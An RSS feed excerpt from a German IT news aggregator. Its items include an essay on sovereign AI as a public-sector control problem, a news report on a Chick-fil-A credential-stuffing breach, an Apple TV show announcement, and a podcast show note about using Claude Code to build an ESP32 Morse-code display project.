<title><![CDATA[How Synthetic Identity Fraud is Coming for Machine Identities]]></title>
<description><![CDATA[Most people understand identity theft as an attacker stealing a real person’s sensitive information and impersonating them. Synthetic identity fraud is much harder to catch. Instead of stealing a real identity, the attacker manufactures a new one, frankensteining together several…
Read more →
The...]]></description>
<link>https://tsecurity.de/de/3688983/it-security-nachrichten/how-synthetic-identity-fraud-is-coming-for-machine-identities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688983/it-security-nachrichten/how-synthetic-identity-fraud-is-coming-for-machine-identities/</guid>
<pubDate>Thu, 23 Jul 2026 14:13:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most people understand identity theft as an attacker stealing a real person’s sensitive information and impersonating them. Synthetic identity fraud is much harder to catch. Instead of stealing a real identity, the attacker manufactures a new one, frankensteining together several…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/how-synthetic-identity-fraud-is-coming-for-machine-identities/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/how-synthetic-identity-fraud-is-coming-for-machine-identities/">How Synthetic Identity Fraud is Coming for Machine Identities</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Thu, 23 Jul 2026 11:05:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chick-fil-A Confirms Customer Data Accessed in Cyberattack]]></title>
<description><![CDATA[Chick-fil-A data security incident may have exposed personal and account information belonging to customers after unauthorized parties launched an automated attack against the company’s website and mobile application. The incident targeted certain Chick-fil-A One accounts between June 17 and June...]]></description>
<link>https://tsecurity.de/de/3688259/it-security-nachrichten/chick-fil-a-confirms-customer-data-accessed-in-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688259/it-security-nachrichten/chick-fil-a-confirms-customer-data-accessed-in-cyberattack/</guid>
<pubDate>Thu, 23 Jul 2026 09:24:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Chick-fil-A Data Security" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Chick-fil-A Confirms Customer Data Accessed in Cyberattack 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="270" data-end="647">Chick-fil-A data security incident may have exposed personal and account information belonging to customers after unauthorized parties launched an automated attack against the company’s website and mobile application. The incident targeted certain Chick-fil-A One accounts between June 17 and June 19, 2026, using account credentials obtained from a third-party source.</p>
<p data-start="649" data-end="971">Chick-fil-A said it identified suspicious login activity involving certain Chick-fil-A One accounts and immediately took steps to prevent further unauthorized access. The company launched an investigation and determined on July 13, 2026, that unauthorized parties may have accessed information stored in affected accounts.</p>
<p data-start="973" data-end="1163">The company notified affected customers about the incident and outlined the types of information that may have been involved, along with steps taken to secure accounts and protect customers.</p>

<h3 data-section-id="qabuka" data-start="1165" data-end="1234"><span role="text"><strong data-start="1169" data-end="1234">Chick-fil-A Data Security Incident Linked to Automated Attack</strong></span></h3>
<p data-start="1236" data-end="1531">According to the <a href="https://www.mass.gov/doc/2026-1188-chick-fil-a-inc/download?utm_source=tugatech.com.pt" target="_blank" rel="nofollow noopener">notice sent to customers</a>, the Chick-fil-A data security incident involved an automated attack against the company's website and mobile application. The attackers used account credentials, including email addresses and <a href="https://thecyberexpress.com/steps-to-create-unbreakable-passwords/" target="_blank" rel="noopener">passwords</a>, that were obtained from a third-party source.</p>
<p data-start="1533" data-end="1754">The activity took place over a three-day period between June 17 and June 19. After identifying suspicious login activity, Chick-fil-A moved to prevent additional unauthorized activity and began investigating the incident.</p>
<p data-start="1756" data-end="1903">The company said its investigation later determined that unauthorized parties may have accessed information in customers' Chick-fil-A One accounts.</p>

<h3 data-section-id="1h8k3wz" data-start="1905" data-end="1975"><span role="text"><strong data-start="1909" data-end="1975">Chick-fil-A One Accounts May Have Exposed Personal Information</strong></span></h3>
<p data-start="1977" data-end="2094">The information potentially accessed in the incident varied depending on what customers had stored in their accounts.</p>
<p data-start="2096" data-end="2434">Potentially affected <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29091">data</a> may have included customers' names, email addresses, Chick-fil-A One membership numbers and mobile pay numbers. The information may also have included <a href="https://thecyberexpress.com/free-wifi-qr-code-risk-experiment/" target="_blank" rel="noopener">QR codes</a>, the last four digits of credit or debit card numbers, and the amount of Chick-fil-A credit, such as an e-gift card balance, associated with an account.</p>
<p data-start="2436" data-end="2620">For customers who had additional information saved to their accounts, the potentially exposed data may also have included the month and day of their birthday, phone number and address.</p>
<p data-start="2622" data-end="2717">The company did not state that all listed information was accessed for every affected customer.</p>

<h3 data-section-id="11jyvqk" data-start="2719" data-end="2783"><span role="text"><strong data-start="2723" data-end="2783">Chick-fil-A Resets Passwords and Removes Payment Methods</strong></span></h3>
<p data-start="2785" data-end="2979">Following the incident, Chick-fil-A said it took immediate action to protect affected accounts. The measures included forcing log-outs from impacted accounts and removing stored payment methods.</p>
<p data-start="2981" data-end="3159">The company also restored the balances of impacted Chick-fil-A One accounts. As an additional measure for affected customers, Chick-fil-A said it added rewards to their accounts.</p>
<p data-start="3161" data-end="3300">The company said it continues to enhance its <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29090">security</a>, monitoring and fraud controls to reduce the risk of similar incidents in the future.</p>

<h3 data-section-id="ebuey1" data-start="3302" data-end="3357"><span role="text"><strong data-start="3306" data-end="3357">Chick-fil-A Urges Customers to Update Passwords</strong></span></h3>
<p data-start="3359" data-end="3503">Chick-fil-A said it has <a href="https://thecyberexpress.com/tce-weekly-roundup-five-eyes-ai-kddi-tfl/" target="_blank" rel="noopener">reset the passwords</a> associated with affected accounts and urged customers to update their passwords as soon as possible.</p>
<p data-start="3505" data-end="3690">The company recommended that customers choose strong, difficult-to-guess passwords that are unique to their Chick-fil-A accounts and not reused across other websites or online services.</p>
<p data-start="3692" data-end="3934">The company also encouraged customers to remain vigilant against potential identity theft and <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="29092">fraud</a>. Customers were advised to review their credit reports and account statements carefully and check for any activity that they do not recognize.</p>
<p data-start="3936" data-end="4288" data-is-last-node="" data-is-only-node="">The Chick-fil-A data security incident highlights the risks associated with compromised account credentials being used in automated attacks. While the company said it took steps to secure affected accounts and restore balances, customers are being encouraged to take additional precautions to protect their personal information and online accounts.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Announces ‘Protective Custody’ With Benicio Del Toro, Ben Stiller]]></title>
<description><![CDATA[Apple TV has announced Protective Custody, a new comedy series starring Benicio Del Toro and Ben Stiller. The project brings the two actors together again after their work on Escape at Dannemora.




https://twitter.com/AppleTV/status/2079974849045536933




What is Protective Custody about?



T...]]></description>
<link>https://tsecurity.de/de/3687967/ios-mac-os/apple-tv-announces-protective-custody-with-benicio-del-toro-ben-stiller/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687967/ios-mac-os/apple-tv-announces-protective-custody-with-benicio-del-toro-ben-stiller/</guid>
<pubDate>Thu, 23 Jul 2026 06:30:57 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has announced Protective Custody, a new comedy series starring Benicio Del Toro and Ben Stiller. The project brings the two actors together again after their work on Escape at Dannemora.




https://twitter.com/AppleTV/status/2079974849045536933




What is Protective Custody about?



The series follows a disgraced financier accused of carrying out a massive fraud. While awaiting trial, he enters protective custody and must learn how to survive prison politics.



At the same time, the financier tries to repair his damaged reputation and face the consequences of his actions. Apple has not revealed which characters Del Toro and Stiller will play.



Experienced comedy creators lead the series



Mike Judge, Steve Hely, and Dave King will serve as writers, executive producers, and showrunners. Judge will also direct the series.



The creative team has previously worked on popular comedies including King of the Hill, Silicon Valley, Veep, and Parks and Recreation.



Stiller will also executive produce Protective Custody. The project gives Del Toro his first leading role in a television comedy series. Apple TV has not announced a production schedule, episode count, or release date yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4689: Cheap Yellow Display Project Part 8: Writing the code]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.



Hello, again. This is Trey.










Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  










If you wish to catch up on earlier episodes, you can find them on my 

HPR profile page



https://www.hackerp...]]></description>
<link>https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</guid>
<pubDate>Thu, 23 Jul 2026 02:06:01 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

Hello, again. This is Trey.

</p>

<p>


</p>

<p>

Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  

</p>

<p>


</p>

<p>

If you wish to catch up on earlier episodes, you can find them on my 
<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
HPR profile page</a>


<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
https://www.hackerpublicradio.org/correspondents/0394.html</a>



</p>

<p>


</p>

<p>

It is hard to believe that I started this project and the HPR series to document it more than a year ago.  Time flies.  Life happens. I spent the last 8 months so focused on work related activities that I had to set the project aside.  And once I set it aside, it was difficult to get back to again.  The one time I tried, I found that my son's old Windows laptop, which I had commandeered to use for the project, was once and truly dead.  

</p>

<p>


</p>

<p>

We live in a different world now than we did when I began this project.  Today, everything is about AI – how it is changing our world, increasing efficiencies, and even displacing certain types of jobs.  "Vibe coding" is transforming the way we make software, and now everyone is a developer.

</p>

<p>


</p>

<p>

Within my organization, we are all being strongly encouraged to learn more about AI and apply it in our daily work.  We are blessed to have access to a wide range of training and to powerful tools which support the process.  Several colleagues within my organization and outside my organization have recommended Claude Code -- for development, for organization, for brainstorming, and for much more.  My role is not that of a developer, and I have had no need for Claude Code at work.  There are plenty of other tools for me to use.

</p>

<p>


</p>

<p>

But at home, I thought... I could install Claude Code at home to experiment with and to learn.  And then it hit me.  I wonder if I could use Claude Code to help me with my stalled CYD project.  

</p>

<p>


</p>

<p>

"Hello, my name is Trey, and I am a fraud."

</p>

<p>


</p>

<p>

OK.  I don't think I am a fraud, but having never used such a powerful tool to help me code, I feel a little bit like a fraud, with Claude doing the work for me. Let's talk through what we did.

</p>

<p>


</p>

<p>

As I mentioned, I was unable to use the laptop on which I created the original GUI code.  But no worries, because It was all on GitHub, right?

</p>

<p>


</p>

<p>

So, I began by trying to install Claude Code on one of my Ubuntu machines.  That failed miserably, and all the instructions I found online recommended running it on Windows.  So I transitioned to installing Claude Code on a freshly built Windows 10 system using some old hardware which will not support Windows 11.  Surprisingly, It seems that Claude wants to run within Ubuntu on Windows Subsystem for Linux (WSL).

</p>

<p>


</p>

<p>

Once I went through all the hoops for installing and setting up my basic subscription, I got to work.  I created a new directory to use for all my project files, and another one for Claude to write all its output files to.

</p>

<p>


</p>

<p>

Everything I have read and heard about using Claude Code for a project like this recommended beginning by using Claude to create the project plan.  So my first prompt was as follows:

</p>

<p>


</p>

<p>

"I am building a project using an ESP32 cheap yellow display. The final goal is to have a device with a graphical user interface which will allow me store several text messages, each assigned to their own specific button. Then, when one of the buttons is pressed, the message will be converted into morse code, and the message will be sent by blinking an onboard LED. I already have the initial design for the GUI coded in my github repository. Please construct a detailed step by step plan for building this application"

</p>

<p>


</p>

<p>

I wanted to keep it simple at the beginning, so even though I plan to use an opto-isolated relay for the output, I am starting out using the built in LED.

</p>

<p>


</p>

<p>

Claude asked me for the URL for my Github repository, and I provided it.  After thinking for a bit, it produced a project plan.

</p>

<p>


</p>

<p>

CYD Morse Sender — Step-by-Step Build Plan

</p>

<p>


</p>

<p>

What You Already Have

</p>

<p>

- 3 fully designed LVGL screens (Send, Config, Keyboard)

</p>

<p>

- 7 send buttons with green styling on the Send Screen

</p>

<p>

- Speed slider (5–30 WPM) and program slot dropdown on Config Screen

</p>

<p>

- Text area + LVGL keyboard widget on Keyboard Screen

</p>

<p>

- Display driver and touchscreen hardware initialized (but touch read was stubbed out)

</p>

<p>

---

</p>

<p>

Phase 1: Fix Touchscreen Input

</p>

<p>

Initialize the XPT2046 on VSPI, replace the hardcoded touched = false with real touch data, calibrate raw ADC coordinates to screen pixels, and verify all three nav buttons transition screens correctly.                         

</p>

<p>


</p>

<p>

Phase 2: Persistent Message Storage

</p>

<p>

Use Preferences.h / NVS to store 7 messages ("msg0" – "msg6") that survive power cycles. Load on boot and populate send button labels.

</p>

<p>


</p>

<p>

Phase 3: Config Screen — Slot Selection &amp; Speed

</p>

<p>

Wire the Program dropdown to g_selectedSlot, wire the Speed slider to g_wpm with a live WPM label, and wire the Set button to clear the text area and navigate to the Keyboard Screen.

</p>

<p>


</p>

<p>

Phase 4: Keyboard Screen — Capture and Save Text

</p>

<p>

On keyboard OK (LV_EVENT_READY): read the text area, save to NVS, update the send button label, navigate back. On Cancel: navigate back without saving.

</p>

<p>


</p>

<p>

Phase 5: Morse Code Engine

</p>

<p>

Build morse.h with the full A–Z / 0–9 lookup table, a textToMorse() converter, and Paris-standard timing (unit_ms = 1200 / wpm).

</p>

<p>


</p>

<p>

Phase 6: Non-Blocking LED Transmission

</p>

<p>

State machine (IDLE / LED_ON / LED_OFF) driven by millis() in a morseUpdate() function called every loop — no delay().   LED on GPIO 17 (blue).

</p>

<p>


</p>

<p>

Phase 7: Wire the Send Buttons

</p>

<p>

Each button calls startMorse(getMessage(slot)) if not already transmitting. Disable all send buttons during TX; re-enable when the state machine reaches the end.

</p>

<p>


</p>

<p>

Phase 8: Integration &amp; Polish

</p>

<p>

Stop button, WPM persistence, empty-slot guard, serial debug output, final touch calibration, end-to-end test checklist.

</p>

<p>

---

</p>

<p>

Recommended order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8

</p>

<p>


</p>

<p>


</p>

<p>

This was wild!  Claude determined exactly how far along I was in the project, and also alerted me to the fact that the "touch read was stubbed out".  Ugh.  This means that the files I had uploaded to GitHub were my original GUI files (Episode 05 – HPR4532 - 
<a href="https://hackerpublicradio.org/eps/hpr4532/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4532/index.html</a>

) and not the ones that I finally got working properly (Episode 07 – HPR4624 - 
<a href="https://hackerpublicradio.org/eps/hpr4624/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4624/index.html</a>

).  That was my own fault.  Did I mention that I don't get Git?  I REALLY need to learn to properly use Git!

</p>

<p>


</p>

<p>

But, we have a plan, broken down by eight numbered phases.  And they seem to address all the functionality I wanted with a few additional things I had not thought about.  Interestingly, even though these phases are sequentially numbered, Claud recommended that we approach them in a bizarre order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8 .

</p>

<p>


</p>

<p>

Alright.  Let's see what we can do.  The first phase is to fix the touchscreen input.  

</p>

<p>


</p>

<p>

Claude took me through it step-by-step, asking as it needed to read specific project files.

</p>

<p>


</p>

<p>

Finally, it wrote a new ui.ino code file to my speficied output directory for me to test.  I copied it into the correct file location, said a quick prayer, compiled in Arduino IDE, and downloaded to the CYD.

</p>

<p>


</p>

<p>

Well, that is... interesting.  The display looked nothing like it was supposed to.  There were vertical green bars with smaller dashed green vertical stripes in them. I will include a picture in the show notes so that you can see what it looked like and why it was so difficult to describe.  

</p>

<p>


</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

I spent the next hour or so trying to explain what I was seeing to a chat bot.  Claude recommended potential fixes which either did nothing or made the situation worse.  I began questioning whether this was a good idea, how people actually gained efficiencies talking to a bot, and even several life choices.  

</p>

<p>


</p>

<p>

Then I had a thought.  I prompted Claude:

</p>

<p>


</p>

<p>

If I were to take a picture of the screen on the cheap yellow display and copy it into the output folder, would you be able to analyze it to better determine what is wrong and how to fix it?

</p>

<p>


</p>

<p>

Shockingly, Claude answered in the affirmative, and told me to copy the picture to the output folder and let it know when to proceed.  It analyzed the picture and more of the supporting files it had copied from my GitHub, asking each time if it could access that file.  It determined that my original code was written for a flavor of LVGL version 8 and I was now using LVGL 9.5.  

</p>

<p>


</p>

<p>

It recommended changes, and then asked permission to make those changes, file by file.  .h files &amp; .c files,  Finally, I just gave it permission to edit the files in the project folder without asking for permission for each file each time.  Claude was still explaining each change, showing me exactly what would be changed, and asking for permission, so that I could review all of the changes.  But now it was not asking additional permission to write to each of the impacted files.

</p>

<p>


</p>

<p>

Next, Code compiled and downloaded.  Different screen, but not right. Again, I took a picture and gave it to Claude to analyze.  So, Claude paused and altered the code to generate a specific test pattern overtop of the GUI.

</p>

<p>


</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

The test pattern was supposed to cover the entire rectangular screen.  But parts of the pattern were in a square on the screen and parts were not.  Another photograph and analysis, told Claude that there were some rotation/screensize issues.

</p>

<p>


</p>

<p>

We repeated this several times.  Some resulted in improvement, and others did not.

</p>

<p>


</p>

<p>

This is the point where I noticed something interesting. Not about Claude, specifically, or about the app.  But I noticed something interesting about myself and about the process.

</p>

<p>


</p>

<p>

Previously, when I was working through some of these challenges without Claud, I found myself becoming more and more stressed, frustrated, and angry, until I found a solution.  Then another problem would repeat the cycle.  Success in the end was great, but the emotional extremes during the process were not always pleasant.  

</p>

<p>


</p>

<p>

Now, I was effectively managing the project, and relaying information to the resource responsible for fixing the problems -- a very different experience.

</p>

<p>


</p>

<p>

But I also ran into another issue.  Claude became absolutely certain that the problem revolved around the device not accurately knowing where the 4 corners of the screen were.  But in reality, the output of the test pattern was rotated 90 degrees from the actual screen.  It took several iterations of me insisting that the problem had to do with screen orientation and not corner coordinates.  It was interesting to experience the tool doubling down on an obvious mistake, but we finally resolved that.

</p>

<p>


</p>

<p>

Again, while it was frustrating, it was much less stressful.

</p>

<p>


</p>

<p>


</p>

<p>

We proceeded to 
<strong>

<em>
Phase 2: Persistent Message Storage</em>

</strong>

where we ensured that the button labels on the send screen were stored in the devices persistent storage, so that, when they are edited to contain the message they should send, that information would survive a reboot.

</p>

<p>


</p>

<p>

Next, we combined elements of 
<strong>

<em>
Phase 5: Morse Code Engine</em>

</strong>

, 
<strong>

<em>
Phase 6: Non-Blocking LED Transmission</em>

</strong>

, and 
<strong>

<em>
Phase 7: Wire the Send Buttons</em>

</strong>

together. Building the morse code engine was an area I had been thinking about for a while.  I already had working parts of something similar in the Arduino practice oscillator I have referenced a few times in this series.  The code for the practice oscillator may be found on my GitHub, but it was all based on original code from jmharvey1, with my only contribution being making pin assignments variables so that the code could easily be ported to different devices.  

</p>

<p>


</p>

<p>

So, I was happy that we were building the morse code engine directly.  The code for it may be found in morse.h, which uses a constant character lookup table to define each character.  Without any specific direction from me, Claude used the PARIS timing methods I have already described within Episode 6 of this series.  It defines timing for DOT, DASH, LETTER_GAP, and WORD_GAP, and all are based on a simple calculation of 1200 ms / the number of words per minute (WPM) we wish to transmit.

</p>

<p>


</p>

<p>

Along the way, we discovered that, if we tried to use the delay() function, it would crash the program due to a conflict with the LVGL timer used for touchscreen inputs. Claude altered all the delays accordingly.
